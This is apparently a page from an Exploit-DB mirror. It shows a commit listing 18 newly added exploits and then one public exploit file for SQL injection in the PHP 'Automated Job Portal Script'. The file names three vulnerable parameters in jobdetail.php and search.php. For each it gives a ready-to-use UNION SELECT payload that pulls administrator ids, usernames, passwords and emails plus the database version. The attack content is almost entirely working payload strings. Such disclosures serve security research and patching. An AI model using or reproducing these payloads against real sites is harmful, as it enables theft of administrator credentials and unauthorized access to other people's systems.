exploit-db-mirror/platforms/php/webapps/41302.txt
Offensive Security dcc7720ad6 DB: 2017-02-11
18 new exploits

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
F5 BIG-IP SSL Virtual Server - Memory Disclosure
CMS Lite 1.3.1 - SQL Injection
Tiger Post 3.0.1 - SQL Injection
Gram Post 1.0 - SQL Injection
Youtube Analytics Multi Channel 3.0 - SQL Injection
Collabo - Arbitrary File Download
Takas Classified 1.1 - SQL Injection
Zigaform - SQL Injection
Multilanguage Estate Agency Pro 1.2 - SQL Injection
QWIKIA 1.1.1 - SQL Injection
Automated Job Portal Script - SQL Injection
CLUB-8 EMS - SQL Injection
Uploadr - SQL Injection
CodePaul ClipMass - SQL Injection
Video Subscription - SQL Injection
D-link DIR-600M - Cross-Site Request Forgery
HotelCMS with Booking Engine - SQL Injection
2017-02-11 05:01:16 +00:00

23 lines
No EOL
1.4 KiB
Text
Executable file

# # # # #
# Exploit Title: Automated Job Portal Script - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.jagaad.com/
# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/jobdetail.php?id=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -